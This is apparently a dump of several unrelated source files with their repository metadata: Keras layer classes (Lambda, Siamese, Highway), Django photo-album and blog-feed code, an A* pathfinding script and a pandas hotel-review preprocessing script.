        self.b = K.zeros((self.nb_feature, self.output_dim))
        self.trainable_weights = [self.W, self.b]
        self.regularizers = []
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        if self.initial_weights is not None:
            self.set_weights(self.initial_weights)
            del self.initial_weights
    @property
    def output_shape(self):
        return (self.input_shape[0], self.output_dim)
    def get_output(self, train=False):
        X = self.get_input(train)
        # -- don't need activation since it's just linear.
        # axis=1 is the nb_feature axis: take the max over the linear pieces.
        output = K.max(K.dot(X, self.W) + self.b, axis=1)
        return output
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'output_dim': self.output_dim,
                  'init': self.init.__name__,
                  'nb_feature': self.nb_feature,
                  'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
                  'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
                  'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
                  'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
                  'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
                  'input_dim': self.input_dim}
        base_config = super(MaxoutDense, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class Lambda(Layer):
    '''Used for evaluating an arbitrary Theano / TensorFlow expression
    on the output of the previous layer.
    # Input shape
        Arbitrary. Use the keyword argument input_shape
        (tuple of integers, does not include the samples axis)
        when using this layer as the first layer in a model.
    # Output shape
        Specified by `output_shape` argument.
    # Arguments
        function: The function to be evaluated.
            Takes one argument: the output of previous layer.
        output_shape: Expected output shape from function.
            Could be a tuple or a function of the shape of the input.
    '''
    def __init__(self, function, output_shape=None, **kwargs):
        super(Lambda, self).__init__(**kwargs)
        py3 = sys.version_info[0] == 3
        # Store the function as marshalled bytecode so the layer can be
        # serialized; it is re-hydrated in get_output().
        if py3:
            self.function = marshal.dumps(function.__code__)
        else:
            assert hasattr(function, 'func_code'), ('The Lambda layer "function"'
                                                    ' argument must be a Python function.')
            self.function = marshal.dumps(function.func_code)
        if output_shape is None:
            self._output_shape = None
        elif type(output_shape) in {tuple, list}:
            self._output_shape = tuple(output_shape)
        else:
            # output_shape given as a callable: marshal it like `function`.
            if py3:
                self._output_shape = marshal.dumps(output_shape.__code__)
            else:
                self._output_shape = marshal.dumps(output_shape.func_code)
        # Bug fix: a second, argument-less super().__init__() call used to
        # sit here; it was redundant (the base class is already initialized
        # above, with kwargs) and could clobber state set by the first call.
    @property
    def output_shape(self):
        if self._output_shape is None:
            # Default: the function is assumed shape-preserving.
            return self.input_shape
        elif type(self._output_shape) == tuple:
            # Explicit tuple: prepend the (batch) axis from the input.
            return (self.input_shape[0], ) + self._output_shape
        else:
            # Callable form: un-marshal and evaluate on the input shape.
            output_shape_func = marshal.loads(self._output_shape)
            output_shape_func = types.FunctionType(output_shape_func, globals())
            shape = output_shape_func(self.input_shape)
            if type(shape) not in {list, tuple}:
                raise Exception('output_shape function must return a tuple')
            return tuple(shape)
    def get_output(self, train=False):
        X = self.get_input(train)
        # Re-hydrate the marshalled function and apply it to the input.
        func = marshal.loads(self.function)
        func = types.FunctionType(func, globals())
        return func(X)
class MaskedLambda(MaskedLayer, Lambda):
    '''`Lambda` combined with `MaskedLayer` (first in the MRO), presumably
    so the arbitrary expression can be used on masked input; no behavior
    is added beyond what the two parent classes provide.'''
    pass
class LambdaMerge(Lambda):
    '''LambdaMerge layer for evaluating an arbitrary Theano / TensorFlow
    function over multiple inputs.
    # Output shape
        Specified by output_shape argument
    # Arguments
        layers: Input layers. Similar to layers argument of Merge.
        function: The function to be evaluated. Takes one argument:
            list of outputs from input layers.
        output_shape: Expected output shape from function.
            Could be a tuple or a function of list of input shapes.
    '''
    def __init__(self, layers, function, output_shape=None):
        if len(layers) < 2:
            raise Exception('Please specify two or more input layers '
                            '(or containers) to merge.')
        self.layers = layers
        self.trainable_weights = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
        # Aggregate params/regularizers/constraints/updates from all inputs.
        for l in self.layers:
            params, regs, consts, updates = l.get_params()
            self.regularizers += regs
            self.updates += updates
            # params and constraints have the same size
            for p, c in zip(params, consts):
                if p not in self.trainable_weights:
                    self.trainable_weights.append(p)
                    self.constraints.append(c)
        # Store the merge function as marshalled bytecode (see Lambda).
        py3 = sys.version_info[0] == 3
        if py3:
            self.function = marshal.dumps(function.__code__)
        else:
            self.function = marshal.dumps(function.func_code)
        if output_shape is None:
            self._output_shape = None
        elif type(output_shape) in {tuple, list}:
            self._output_shape = tuple(output_shape)
        else:
            if py3:
                self._output_shape = marshal.dumps(output_shape.__code__)
            else:
                self._output_shape = marshal.dumps(output_shape.func_code)
        # Deliberately skip Lambda.__init__ (it would re-marshal `function`
        # with a different signature); initialize Lambda's base class instead.
        super(Lambda, self).__init__()
    @property
    def output_shape(self):
        input_shapes = [layer.output_shape for layer in self.layers]
        if self._output_shape is None:
            # Default: assume the merge preserves the first input's shape.
            return input_shapes[0]
        elif type(self._output_shape) == tuple:
            return (input_shapes[0][0], ) + self._output_shape
        else:
            output_shape_func = marshal.loads(self._output_shape)
            output_shape_func = types.FunctionType(output_shape_func, globals())
            shape = output_shape_func(input_shapes)
            if type(shape) not in {list, tuple}:
                raise Exception('output_shape function must return a tuple.')
            return tuple(shape)
    def get_params(self):
        return self.trainable_weights, self.regularizers, self.constraints, self.updates
    def get_output(self, train=False):
        # Re-hydrate the marshalled function and call it on the list of
        # outputs from all merged layers.
        func = marshal.loads(self.function)
        func = types.FunctionType(func, globals())
        inputs = [layer.get_output(train) for layer in self.layers]
        return func(inputs)
    def get_input(self, train=False):
        # Union of the inputs of all merged layers, without duplicates.
        res = []
        for i in range(len(self.layers)):
            o = self.layers[i].get_input(train)
            if not type(o) == list:
                o = [o]
            for output in o:
                if output not in res:
                    res.append(output)
        return res
    @property
    def input(self):
        return self.get_input()
    def supports_masked_input(self):
        return False
    def get_output_mask(self, train=None):
        return None
    def get_weights(self):
        weights = []
        for l in self.layers:
            weights += l.get_weights()
        return weights
    def set_weights(self, weights):
        # Distribute the flat weight list across the merged layers.
        for i in range(len(self.layers)):
            # Bug fix: count the i-th layer's parameters (trainable AND
            # non-trainable); the old code mistakenly used the container's
            # own non_trainable_weights, mis-slicing the weight list.
            nb_param = len(self.layers[i].trainable_weights) + len(self.layers[i].non_trainable_weights)
            self.layers[i].set_weights(weights[:nb_param])
            weights = weights[nb_param:]
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'layers': [l.get_config() for l in self.layers],
                  'function': self.function,
                  'output_shape': self._output_shape}
        base_config = super(LambdaMerge, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class Siamese(Layer):
    '''Share a layer across multiple inputs.
    For instance, this allows you to apply e.g.
    the same `Dense` layer to the output of two
    different layers in a graph.
    # Output shape
        Depends on merge_mode argument
    # Arguments
        layer: The layer to be shared across multiple inputs
        inputs: Inputs to the shared layer
        merge_mode: Same meaning as `mode` argument of Merge layer
        concat_axis: Same meaning as `concat_axis` argument of Merge layer
        dot_axes: Same meaning as `dot_axes` argument of Merge layer
        is_graph: Should be set to True when used inside `Graph`
    '''
    def __init__(self, layer, inputs, merge_mode='concat',
                 concat_axis=1, dot_axes=-1, is_graph=False):
        # Validate the merge mode up front (None = no merge, use SiameseHead).
        if merge_mode not in ['sum', 'mul', 'concat', 'ave',
                              'join', 'cos', 'dot', None]:
            raise Exception('Invalid merge mode: ' + str(merge_mode))
        if merge_mode in {'cos', 'dot'}:
            if len(inputs) > 2:
                raise Exception(merge_mode + ' merge takes exactly 2 layers.')
        self.layer = layer
        self.trainable = layer.trainable
        self.is_graph = is_graph
        self.inputs = inputs
        # Initially connect the shared layer to the first input.
        self.layer.set_previous(inputs[0])
        self.merge_mode = merge_mode
        self.concat_axis = concat_axis
        self.dot_axes = dot_axes
        self.trainable_weights = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
        # Collect params from the shared layer (and, outside a Graph with a
        # merge mode set, from the input layers too).
        layers = [layer]
        if merge_mode and not is_graph:
            layers += inputs
        for l in layers:
            params, regs, consts, updates = l.get_params()
            self.regularizers += regs
            self.updates += updates
            # params and constraints have the same size
            for p, c in zip(params, consts):
                if p not in self.trainable_weights:
                    self.trainable_weights.append(p)
                    self.constraints.append(c)
        super(Siamese, self).__init__()
    @property
    def output_shape(self):
        if self.merge_mode is None:
            return self.layer.output_shape
        input_shapes = [self.get_output_shape(i) for i in range(len(self.inputs))]
        if self.merge_mode in ['sum', 'mul', 'ave']:
            # Element-wise modes preserve the per-input shape.
            return input_shapes[0]
        elif self.merge_mode == 'concat':
            output_shape = list(input_shapes[0])
            for shape in input_shapes[1:]:
                output_shape[self.concat_axis] += shape[self.concat_axis]
            return tuple(output_shape)
        elif self.merge_mode == 'join':
            # 'join' returns a dict, so there is no single tensor shape.
            return None
        elif self.merge_mode == 'dot':
            # Remove the contracted axes, then join the remaining ones.
            shape1 = list(input_shapes[0])
            shape2 = list(input_shapes[1])
            for i in self.dot_axes[0]:
                shape1.pop(i)
            for i in self.dot_axes[1]:
                shape2.pop(i)
            shape = shape1 + shape2[1:]
            if len(shape) == 1:
                shape.append(1)
            return tuple(shape)
        elif self.merge_mode == 'cos':
            return (input_shapes[0][0], 1)
    def get_params(self):
        return self.trainable_weights, self.regularizers, self.constraints, self.updates
    def set_layer_input(self, head):
        # Repoint the shared layer at the given input, keeping its weights.
        self.layer.set_previous(self.inputs[head], reset_weights=False)
    def get_output_at(self, head, train=False):
        # Output of the shared layer applied to input `head`.
        X = self.inputs[head].get_output(train)
        mask = self.inputs[head].get_output_mask(train)
        Y = self.layer(X, mask)
        return Y
    def get_output_shape(self, head, train=False):
        self.set_layer_input(head)
        return self.layer.output_shape
    def get_output_join(self, train=False):
        # Dict of per-input outputs, keyed by input layer name.
        o = OrderedDict()
        for i in range(len(self.inputs)):
            X = self.get_output_at(i, train)
            name = getattr(self.inputs[i], 'name', None)
            if name is None:
                raise ValueError('merge_mode="join" '
                                 'only works with named inputs.')
            o[name] = X
        return o
    def get_output_sum(self, train=False):
        s = self.get_output_at(0, train)
        for i in range(1, len(self.inputs)):
            s += self.get_output_at(i, train)
        return s
    def get_output_ave(self, train=False):
        n = len(self.inputs)
        s = self.get_output_at(0, train)
        for i in range(1, n):
            s += self.get_output_at(i, train)
        s /= n
        return s
    def get_output_concat(self, train=False):
        inputs = [self.get_output_at(i, train) for i in range(len(self.inputs))]
        return K.concatenate(inputs, axis=self.concat_axis)
    def get_output_mul(self, train=False):
        s = self.get_output_at(0, train)
        for i in range(1, len(self.inputs)):
            s *= self.get_output_at(i, train)
        return s
    def get_output_dot(self, train=False):
        # Theano-only: relies on batched_tensordot.
        if K._BACKEND != 'theano':
            raise Exception('"dot" merge mode will only work with Theano.')
        from theano import tensor as T
        l1 = self.get_output_at(0, train)
        l2 = self.get_output_at(1, train)
        output = T.batched_tensordot(l1, l2, self.dot_axes)
        output = output.dimshuffle((0, 'x'))
        return output
    def get_output_cos(self, train=False):
        # Theano-only: cosine similarity via batched tensordot.
        if K._BACKEND != 'theano':
            raise Exception('"cos" merge mode will only work with Theano.')
        import theano
        from theano import tensor as T
        l1 = self.get_output_at(0, train)
        l2 = self.get_output_at(1, train)
        output = T.batched_tensordot(l1, l2, self.dot_axes) / T.sqrt(T.batched_tensordot(l1, l1, self.dot_axes) * T.batched_tensordot(l2, l2, self.dot_axes))
        output = output.dimshuffle((0, 'x'))
        return output
    def get_output(self, train=False):
        # Dispatch on the configured merge mode.
        mode = self.merge_mode
        if mode == 'join':
            return self.get_output_join(train)
        elif mode == 'concat':
            return self.get_output_concat(train)
        elif mode == 'sum':
            return self.get_output_sum(train)
        elif mode == 'ave':
            return self.get_output_ave(train)
        elif mode == 'mul':
            return self.get_output_mul(train)
        elif mode == 'dot':
            return self.get_output_dot(train)
        elif mode == 'cos':
            return self.get_output_cos(train)
    def get_input(self, train=False):
        # Union of the inputs of all heads, without duplicates.
        res = []
        for i in range(len(self.inputs)):
            o = self.inputs[i].get_input(train)
            if type(o) != list:
                o = [o]
            for output in o:
                if output not in res:
                    res.append(output)
        return res
    @property
    def input(self):
        return self.get_input()
    def supports_masked_input(self):
        return False
    def get_output_mask(self, train=None):
        return None
    def get_weights(self):
        weights = self.layer.get_weights()
        if self.merge_mode and not self.is_graph:
            for m in self.inputs:
                weights += m.get_weights()
        return weights
    def set_weights(self, weights):
        # Shared layer's weights come first, then each input's in order.
        nb_param = len(self.layer.trainable_weights)
        self.layer.set_weights(weights[:nb_param])
        weights = weights[nb_param:]
        if self.merge_mode and not self.is_graph:
            for i in range(len(self.inputs)):
                nb_param = len(self.inputs[i].trainable_weights)
                self.inputs[i].set_weights(weights[:nb_param])
                weights = weights[nb_param:]
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'layer': self.layer.get_config(),
                  'inputs': [m.get_config() for m in self.inputs],
                  'merge_mode': self.merge_mode,
                  'concat_axis': self.concat_axis,
                  'dot_axes': self.dot_axes,
                  'is_graph': self.is_graph}
        base_config = super(Siamese, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
class SiameseHead(Layer):
    '''Selects one output of a `Siamese` layer built with `merge_mode=None`.
    Should be stacked directly on top of such a Siamese layer; it exposes
    the shared layer's output for the input at index `head`.
    # Arguments
        head: The index at which the output of the Siamese layer
            should be obtained
    '''
    def __init__(self, head):
        self.head = head
        self.trainable_weights = []
        super(SiameseHead, self).__init__()
    def get_input(self, train=False):
        # The "input" of this layer is the Siamese output at index `head`.
        return self.previous.get_output_at(self.head, train)
    def get_output(self, train=False):
        # Pass-through of the selected Siamese output.
        return self.get_input(train)
    @property
    def input_shape(self):
        return self.previous.get_output_shape(self.head)
    def get_config(self):
        merged = dict(super(SiameseHead, self).get_config())
        merged.update({'name': self.__class__.__name__,
                       'head': self.head})
        return merged
def add_shared_layer(layer, inputs):
    '''Use this function to add a shared layer across
    multiple Sequential models without merging the outputs.
    '''
    # Share `layer` over the last layer of every model, then give each
    # model its own SiameseHead selecting the matching output.
    tails = [model.layers[-1] for model in inputs]
    shared = Siamese(layer, tails, merge_mode=None)
    for head_index, model in enumerate(inputs):
        model.add(shared)
        model.add(SiameseHead(head_index))
class Highway(Layer):
    '''Densely connected highway network,
    a natural extension of LSTMs to feedforward networks.
    # Input shape
        2D tensor with shape: `(nb_samples, input_dim)`.
    # Output shape
        2D tensor with shape: `(nb_samples, input_dim)`.
    # Arguments
        init: name of initialization function for the weights of the layer
            (see [initializations](../initializations.md)),
            or alternatively, Theano function to use for weights
            initialization. This parameter is only relevant
            if you don't pass a `weights` argument.
        transform_bias: value for the bias to take on initially (default -2)
        activation: name of activation function to use
            (see [activations](../activations.md)),
            or alternatively, elementwise Theano function.
            If you don't specify anything, no activation is applied
            (ie. "linear" activation: a(x) = x).
        weights: list of numpy arrays to set as initial weights.
            The list should have 1 element, of shape `(input_dim, output_dim)`.
        W_regularizer: instance of [WeightRegularizer](../regularizers.md)
            (eg. L1 or L2 regularization), applied to the main weights matrix.
        b_regularizer: instance of [WeightRegularizer](../regularizers.md),
            applied to the bias.
        activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),
            applied to the network output.
        W_constraint: instance of the [constraints](../constraints.md) module
            (eg. maxnorm, nonneg), applied to the main weights matrix.
        b_constraint: instance of the [constraints](../constraints.md) module,
            applied to the bias.
        input_dim: dimensionality of the input (integer).
            This argument (or alternatively, the keyword argument `input_shape`)
            is required when using this layer as the first layer in a model.
    # References
        - [Highway Networks](http://arxiv.org/pdf/1505.00387v2.pdf)
    '''
    input_ndim = 2
    def __init__(self, init='glorot_uniform', transform_bias=-2,
                 activation='linear', weights=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None, input_dim=None, **kwargs):
        self.init = initializations.get(init)
        self.transform_bias = transform_bias
        self.activation = activations.get(activation)
        self.W_regularizer = regularizers.get(W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        # NOTE: constraints list only covers [W, b]; W_carry and b_carry
        # (created in build()) are unconstrained.
        self.constraints = [self.W_constraint, self.b_constraint]
        self.initial_weights = weights
        self.input_dim = input_dim
        if self.input_dim:
            kwargs['input_shape'] = (self.input_dim,)
        self.input = K.placeholder(ndim=2)
        super(Highway, self).__init__(**kwargs)
    def build(self):
        input_dim = self.input_shape[1]
        # Main transform and carry-gate weights; output dim equals input dim.
        self.W = self.init((input_dim, input_dim))
        self.W_carry = self.init((input_dim, input_dim))
        self.b = K.zeros((input_dim,))
        # initialize with a vector of values `transform_bias`
        self.b_carry = K.variable(np.ones((input_dim,)) * self.transform_bias)
        self.trainable_weights = [self.W, self.b, self.W_carry, self.b_carry]
        self.regularizers = []
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        if self.initial_weights is not None:
            self.set_weights(self.initial_weights)
            del self.initial_weights
    @property
    def output_shape(self):
        # Highway layers preserve the input dimensionality.
        return (self.input_shape[0], self.input_shape[1])
    def get_output(self, train=False):
        X = self.get_input(train)
        # Transform gate T = sigmoid(X.W_carry + b_carry); with a negative
        # transform_bias, T starts near 0 so the layer initially passes X.
        transform_weight = activations.sigmoid(K.dot(X, self.W_carry) + self.b_carry)
        act = self.activation(K.dot(X, self.W) + self.b)
        act *= transform_weight
        # y = T * H(X) + (1 - T) * X
        output = act + (1 - transform_weight) * X
        return output
    def get_config(self):
        config = {'name': self.__class__.__name__,
                  'init': self.init.__name__,
                  'transform_bias': self.transform_bias,
                  'activation': self.activation.__name__,
                  'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
                  'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
                  'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
                  'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
                  'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
                  'input_dim': self.input_dim}
        base_config = super(Highway, self).get_config()
        return dict(list(base_config.items()) + list(config.items()))
| [
"noreply@github.com"
] | DanlanChen.noreply@github.com |
be05cf2b10f7e7bfc6653ce3f061cc78f3aaf2df | 88ff2533b62da1ebfb5cd94cf9857a589f602b14 | /pics/views.py | ba10497b415f1ab0483aae48e394cc5fa590591e | [] | no_license | esdrasbrz/pics-api | 0fabbc2c973c7da8e5a1e2ab70d97d0dedbaef10 | e686fbc0787a670328299893c60f1996aed66464 | refs/heads/master | 2021-01-22T03:17:49.939839 | 2017-02-06T17:37:12 | 2017-02-06T17:37:12 | 81,111,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | from .models import Album, Foto
from .serializers import AlbumSerializer, FotoSerializer
from .permissions import IsOwnerOrReadOnly
from rest_framework.response import Response
from django.http import HttpResponse
from rest_framework.decorators import detail_route
from rest_framework import generics, permissions, renderers, viewsets, serializers
from django.contrib.auth.models import User
from wsgiref.util import FileWrapper
class AlbumViewSet(viewsets.ModelViewSet):
    """
    This viewset automatically provides `list`, `create`, `retrieve`,
    `update` and `destroy` actions.
    """
    queryset = Album.objects.all()
    serializer_class = AlbumSerializer
    # Requires authentication; write access is limited to the album's owner.
    permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)
    def perform_create(self, serializer):
        # Stamp new albums with the requesting user as the owner.
        serializer.save(user=self.request.user)
class FotoViewSet(viewsets.ModelViewSet):
    # CRUD viewset for photos; creation is allowed only into the
    # requesting user's own albums.
    queryset = Foto.objects.all()
    serializer_class = FotoSerializer
    permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)
    def perform_create(self, serializer):
        # Reject uploads into albums owned by a different user.
        album = serializer.validated_data['album']
        if self.request.user.id == album.user_id:
            serializer.save(user=self.request.user)
        else:
            raise serializers.ValidationError('Usuario nao tem acesso ao album')
    @detail_route(methods=['GET'])
    def get_file(self, request, *args, **kwargs):
        # Stream the photo's image file back as a JPEG response.
        # NOTE(review): content_type is hard-coded to image/jpeg regardless
        # of the stored file's actual format — confirm uploads are JPEG-only.
        foto = self.get_object()
        with open(foto.imagem.path, 'rb') as img:
            response = HttpResponse(FileWrapper(img), content_type='image/jpeg')
            return response
| [
"esdrasbrz@gmail.com"
] | esdrasbrz@gmail.com |
89fbdba1b70cdb22da26e68b9978fd3abcd9e436 | 6e3e1834eaad3a0c97bf645238e59a0599e047b4 | /blog/feeds.py | 720465e3999af4b68079e03f4bb4db306ed758e4 | [
"JSON"
] | permissive | davogler/davsite | 2dc42bfebb476d94f92520e8829999859deae80b | edd8ceed560690fa2c3eefde236416ffba559a2e | refs/heads/master | 2021-01-19T06:31:20.655909 | 2014-01-03T19:04:13 | 2014-01-03T19:04:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.core.exceptions import ObjectDoesNotExist
from django.utils.feedgenerator import Atom1Feed
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from blog.models import Category, Entry
current_site = Site.objects.get_current()
class LatestEntriesFeed(Feed):
    '''Atom feed of the latest blog entries for the current site.'''
    author_name = "David Vogler"
    copyright = "http://%s/about/" % current_site.domain
    description = "Latest entries posted to %s" % current_site.name
    feed_type = Atom1Feed
    item_copyright = "http://%s/about/" % current_site.domain
    item_author_name = "David Vogler"
    item_author_link = "http://%s/" % current_site.domain
    link = "/feeds/entries/"
    title = "%s: Latest entries" % current_site.name
    def items(self):
        # Up to 15 entries from the `live` manager (ordering comes from
        # the Entry model/manager, not from this feed).
        return Entry.live.all()[:15]
    def item_pubdate(self, item):
        return item.pub_date
    def item_guid(self, item):
        # Stable "tag:" URI built from domain, publish date, and entry URL.
        return "tag:%s,%s:%s" % (current_site.domain, item.pub_date.strftime('%Y-%m-%d'), item.get_absolute_url())
    def item_categories(self, item):
        return [c.title for c in item.categories.all()]
| [
"dave@sparkhouse.com"
] | dave@sparkhouse.com |
0ad9ed51c42d553820ba8498e80bc709508623a0 | c7189909983e498af6793c25cd96e50815d4a05f | /pathing.py | 75d037c3419c21d79a777d0cb9a4a92eac475a0d | [] | no_license | CapSnCrunch/social-insects | 0a2bdc422fa4491d1f6fc98338a529461e277235 | 7392f81438490d1be7e3379456adae720ed50bd4 | refs/heads/main | 2023-08-29T12:34:36.611393 | 2021-10-19T15:18:48 | 2021-10-19T15:18:48 | 381,561,645 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,180 | py | import numpy as np
# https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2
# https://medium.com/@alvarorubiogomez90/hello-nicholas-e611da90b4eb
class Node():
    """A node in the A* search graph.

    Attributes:
        parent: Node this one was reached from (None for the start node).
        position: (row, col) tuple of the cell in the maze.
        g: cost of the path from the start to this node.
        h: heuristic (Manhattan) estimate from this node to the goal.
        f: total estimated cost, g + h.
    """

    def __init__(self, parent=None, position=None):
        self.parent = parent
        self.position = position
        self.g = 0
        self.h = 0
        self.f = 0

    def __eq__(self, other):
        # Nodes are identified purely by their grid position.
        return self.position == other.position

    def __hash__(self):
        # __eq__ is defined, so define __hash__ too to keep Node hashable.
        return hash(self.position)


def astar(maze, start, end):
    """Return a list of (row, col) tuples forming a path from start to end.

    maze is a 2-D grid (list of lists or ndarray) where 0 marks a walkable
    cell and any other value marks an obstacle.  Movement is 4-directional
    with unit cost and a Manhattan heuristic, so the returned path is
    optimal.  Returns None when no path exists.
    """
    start_node = Node(None, start)
    end_node = Node(None, end)

    open_list = [start_node]
    # Positions already expanded.  A set gives O(1) membership tests in
    # place of the original O(n) scan over a closed *list* per neighbour.
    closed_positions = set()

    while open_list:
        # Pick the open node with the lowest f.  The linear scan keeps the
        # original tie-breaking behaviour (first-lowest wins).
        current_node = open_list[0]
        current_index = 0
        for index, item in enumerate(open_list):
            if item.f < current_node.f:
                current_node = item
                current_index = index

        open_list.pop(current_index)
        closed_positions.add(current_node.position)

        # Goal reached: walk the parent chain back to the start.
        if current_node == end_node:
            path = []
            current = current_node
            while current is not None:
                path.append(current.position)
                current = current.parent
            return path[::-1]  # reverse so the path runs start -> end

        for offset in ((0, -1), (0, 1), (-1, 0), (1, 0)):  # 4-neighbourhood
            node_position = (current_node.position[0] + offset[0],
                             current_node.position[1] + offset[1])

            # Skip cells outside the grid.
            if (node_position[0] < 0 or node_position[0] > len(maze) - 1 or
                    node_position[1] < 0 or node_position[1] > len(maze[len(maze) - 1]) - 1):
                continue
            # Skip obstacles.
            if maze[node_position[0]][node_position[1]] != 0:
                continue
            # Skip positions that were already expanded.
            if node_position in closed_positions:
                continue

            child = Node(current_node, node_position)
            child.g = current_node.g + 1
            # Manhattan distance to the goal.
            child.h = (abs(child.position[0] - end_node.position[0]) +
                       abs(child.position[1] - end_node.position[1]))
            child.f = child.g + child.h

            # Ignore the child if an equal-or-better path to the same
            # position is already waiting on the open list.
            for open_node in open_list:
                if child == open_node and child.g >= open_node.g:
                    break
            else:
                open_list.append(child)

    return None  # open list exhausted: no path exists
if __name__ == '__main__':
    # Demo: a 10x10 grid with a wall down column 1 (rows 1-8) that the
    # path must route around.
    maze = np.zeros((10, 10), dtype=int)
    maze[1:9, 1] = 1

    start = (0, 0)
    end = (5, 2)

    print('maze', maze)
    # Drop the first element so the reported path excludes the start cell.
    path = astar(maze, start, end)[1:]
    print(path)
    print(len(path))
"samuelperales4@gmail.com"
] | samuelperales4@gmail.com |
2bc13d9f7e37cc4b96a7a9017432d5033ac8bdd5 | 1ea32d678e5767b9621f2cbb35aa23235f169907 | /Python Files/1_read_in.py | 2f9ecb4c40f0cfd1e4e80450749c1a2c6d290450 | [] | no_license | papaulul/HotelReviews | f38f6ffe4b45698d212ae1b220351966659ab5b2 | 788d61fab32058799c6b3317b74fd931b604c875 | refs/heads/master | 2022-08-20T06:17:29.497193 | 2019-08-15T21:37:26 | 2019-08-15T21:37:26 | 163,245,280 | 0 | 0 | null | 2022-07-29T22:33:26 | 2018-12-27T03:59:19 | Jupyter Notebook | UTF-8 | Python | false | false | 3,462 | py | #%%
import os
import pandas as pd
import numpy as np
import pymongo
from pymongo import MongoClient
print ('Mongo version', pymongo.__version__)
client = MongoClient('localhost', 27017)
db = client.reviews
reviews = db.full
hotel = db.hotel
import re
import pickle
#%%
hotel = pd.DataFrame(list(hotel.find()), columns = ['_id', 'hotelname', 'hotel_rating', 'url', 'num_amenities', 'amenities', 'price_range', 'num_rooms'])
hotel.rename({'hotelname': 'hotel_name'}, axis=1 ,inplace = True)
#%%
reviews = pd.DataFrame(list(reviews.find()), columns = ['_id', 'review', 'hotel_name', 'travel_type', 'bubble', 'url'])
reviews.rename({'bubble': 'hotel_rating'}, axis=1 ,inplace = True)
#%%
df = [hotel, reviews]
for dframe in df:
dframe.drop('_id', axis=1, inplace = True)
dframe['hotel_name'] = dframe['hotel_name'].apply(lambda x: x[0])
#%%
# Hotel Preprocessing
def review_cleaning(text):
    """Normalise one raw review.

    Drops the "More" token the scraper picks up, then joins the remaining
    fragments into a single stripped string; reviews that end up empty
    become NaN so pandas can treat them as missing.  Note: removes "More"
    from the input list in place.
    """
    if "More" in text:
        text.remove("More")
    return " ".join(text).strip() if text else np.nan
reviews['review']=reviews['review'].apply(review_cleaning)
# Hotel ratings look like "4.5 of 5": take the leading number as a float.
hotel['hotel_rating_hotel']=hotel['hotel_rating'].apply(lambda x: float(str(x).split(" ")[0]) if x != None else np.NaN)
# Review ratings are bubble class names (presumably e.g. 'bubble_45'):
# keep the first digit after the last underscore — TODO confirm format.
reviews['hotel_rating_review']=reviews['hotel_rating'].apply(lambda x: int(str(x).split("_")[-1][0]) if x != None else np.NaN)
hotel.drop('hotel_rating', axis = 1 , inplace = True)
reviews.drop('hotel_rating', axis = 1 , inplace = True)
#%%
# price_range is a token list (e.g. ['$100', '-', '$1,250', ...]); strip the
# '$' (and thousands comma on the upper bound) to get numeric bounds.
hotel['low_price']=hotel['price_range'].apply(lambda x: int(x[0][1:]) if x[0] != "NAN" else np.NaN)
hotel['high_price']=hotel['price_range'].apply(lambda x: int(x[2][1:].replace(",","")) if x[0] != "NAN" else np.NaN)
hotel.drop('price_range', axis = 1, inplace = True)
#%%
# Expanding amenities to individual boolean columns.
# Collect every distinct amenity seen across all hotels.
list_of_all_amenities = []
for row in hotel['amenities']:
    for ele in row:
        if ele not in list_of_all_amenities:
            list_of_all_amenities.append(ele)
# Sort to make the column order deterministic.
list_of_all_amenities = sorted(list_of_all_amenities)
# Work on an explicit copy so the assignments below cannot trigger
# SettingWithCopy behaviour against the original frame.
versus = hotel[['hotel_name', 'amenities']].copy()
# Sort each hotel's own amenity list as well.
versus['amenities'] = versus['amenities'].apply(sorted)
# One column per amenity, defaulting to "not offered".
for amenity in list_of_all_amenities:
    versus[amenity] = False
# Flag the amenities each hotel actually offers.
# (.at replaces DataFrame.set_value, which was removed in pandas 1.0.)
for ind, value in enumerate(versus['amenities']):
    for ele in value:
        versus.at[ind, ele] = True
# Fold the boolean columns back onto the hotel frame and drop the raw lists.
hotel = hotel.merge(versus.drop('amenities',axis=1), how = 'inner', on ="hotel_name").drop('amenities',axis=1)
hotel.to_pickle('files/hotel_info.pkl')
#%%
#%%
# Normalise the en-dash in two hotel names to a plain hyphen so the review
